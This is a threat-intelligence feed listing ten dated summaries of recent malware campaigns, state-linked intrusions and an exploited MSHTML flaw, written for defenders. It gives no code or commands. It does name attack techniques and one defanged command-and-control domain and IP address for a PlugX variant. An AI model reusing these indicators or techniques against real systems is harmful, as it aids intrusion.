LATEST THREAT INTELLIGENCE.
Chrome Extensions: Are you getting more than you bargained for?
Description: This analysis reveals the hidden dangers of certain Chrome extensions available on the Google Chrome Web Store. Despite the store's vetting process, some malicious extensions have slipped through, compromising user security. The study examines four examples of extensions with combined user bases exceeding 100,000, showcasing various security risks. These include undisclosed clipboard access to remote domains, data exfiltration, remote code execution capabilities, search hijacking, and cross-site scripting vulnerabilities. The extensions employ tactics such as command-and-control infrastructure with domain generation algorithms, user tracking, and brand impersonation. The research emphasizes the importance of caution when installing browser extensions, even from trusted sources, and recommends immediate uninstallation of the identified malicious extensions.
Created at: 2026-01-26T15:40:31.078000
Updated at: 2026-02-25T15:02:40.499000
Malware MoonPeak Executed via LNK Files
Description: In January 2026, IIJ observed malicious LNK files targeting Korean users to execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with a LNK file that runs an obfuscated PowerShell script, which checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload from GitHub, which is actually the MoonPeak malware. MoonPeak is obfuscated using ConfuserEx and communicates with a C2 server. The campaign utilizes GitHub for hosting malware, a technique known as Living Off Trusted Sites (LOTS). This attack demonstrates the ongoing threat posed by North Korean actors targeting various countries and individuals worldwide.
Created at: 2026-01-26T14:28:48.027000
Updated at: 2026-02-25T14:02:21.153000
Inside the Fix: Analysis of In-the-Wild Exploit of CVE-2026-21513
Description: This analysis examines CVE-2026-21513, a security bypass vulnerability in Microsoft's MSHTML framework, patched in February 2026. The flaw, actively exploited by Russian state-sponsored actor APT28, affects all Windows versions and has a CVSS score of 8.8. Using PatchDiff-AI, researchers identified the root cause in ieframe.dll's hyperlink navigation handling, allowing arbitrary file execution outside the browser's security context. The exploit involves a crafted Windows Shortcut file embedding HTML, communicating with APT28-linked infrastructure. It bypasses security measures like Mark of the Web and IE Enhanced Security Configuration through nested iframes and DOM manipulation, ultimately invoking ShellExecuteExW for out-of-sandbox execution.
Created at: 2026-02-25T11:46:21.970000
Updated at: 2026-02-25T11:50:33.555000
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with Fastflux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2026-02-25T11:46:57.559000
Mercenary Akula Hits Ukraine-Supporting Financial...
Description: A European financial institution involved in regional development and reconstruction initiatives was targeted by a social engineering attack attributed to the Russia-aligned Mercenary Akula. The attack used a spoofed Ukrainian judicial domain to deliver an email containing a link to a remote access payload. The target was a senior legal and policy advisor involved in procurement. The attack employed a multi-stage extraction process and deployed the Remote Manipulator System, a legitimate remote administration tool. This incident suggests the adversary may be expanding beyond primarily Ukraine-based targeting, potentially probing Ukraine-supporting institutions in Western Europe. The attack aligns with Mercenary Akula's established tactics, including localized social engineering, multi-stage payload delivery, and the use of signed remote administration tools.
Created at: 2026-02-25T11:35:21.172000
Updated at: 2026-02-25T11:44:22.329000
The Latest PlugX Variant Executed by STATICPLUGIN
Description: In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.
Created at: 2026-02-25T11:36:09.887000
Updated at: 2026-02-25T11:43:13.025000
A $6,000 Russian Malware Toolkit with Chrome Web Store Guarantee
Description: A new malware-as-a-service toolkit called 'Stanley' is being sold on Russian cybercrime forums for $2,000 to $6,000. It provides a turnkey website-spoofing operation disguised as a Chrome extension, with the premium tier promising guaranteed publication on the Chrome Web Store. The toolkit allows full-page website spoofing, element injection, push notifications, and backup domain rotation. It uses victims' IP addresses for tracking and implements a persistent polling mechanism to communicate with the command and control server. The malware's core attack involves website spoofing via iframe overlay, allowing attackers to harvest credentials while displaying legitimate URLs in the browser's address bar.
Created at: 2026-01-26T08:52:20.218000
Updated at: 2026-02-25T00:02:29.420000
Developer-targeting campaign using malicious Next.js repositories
Description: A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.
Created at: 2026-02-24T21:29:53.984000
Updated at: 2026-02-24T21:47:41.200000
Fake Zoom meeting 'update' silently installs surveillance software
Description: A deceptive campaign is using a fake Zoom meeting website to covertly install Teramind, a commercial monitoring tool, on unsuspecting users' Windows machines. The operation begins with a convincing imitation of a Zoom video call, complete with scripted participants and artificial technical issues. An automatic 'Update Available' prompt then initiates the download of a malicious installer without user consent. The installed software is a covert build of Teramind, designed to run invisibly and avoid detection by security tools. This campaign is particularly dangerous due to its use of legitimate commercial software, which may evade traditional antivirus detection. The attackers exploit users' trust in Zoom and Microsoft to execute their plan, highlighting the importance of verifying meeting links and being cautious with unexpected software updates.
Created at: 2026-02-24T20:39:33.261000
Updated at: 2026-02-24T20:44:50.900000
Nefilim Ransomware
Description: Nefilim ransomware emerged in March 2020, evolving from Nemty's code. It targets vulnerabilities in Citrix gateway devices and uses exposed Remote Desktop Protocol for initial access. The malware exfiltrates sensitive data before encryption and threatens to publish it if ransom isn't paid. Nefilim uses tools like PsExec, Mimikatz, and LaZagne for lateral movement and credential theft. It employs AES-128 encryption and drops a ransom note named 'NEFILIM-DECRYPT.txt'. The ransomware has attacked high-profile targets like Toll Group. Mitigation strategies include strong passwords, disabling RDP, regular backups, software updates, and monitoring for lateral movement and data exfiltration.
Created at: 2026-02-24T17:00:03.998000
Updated at: 2026-02-24T20:37:58.162000
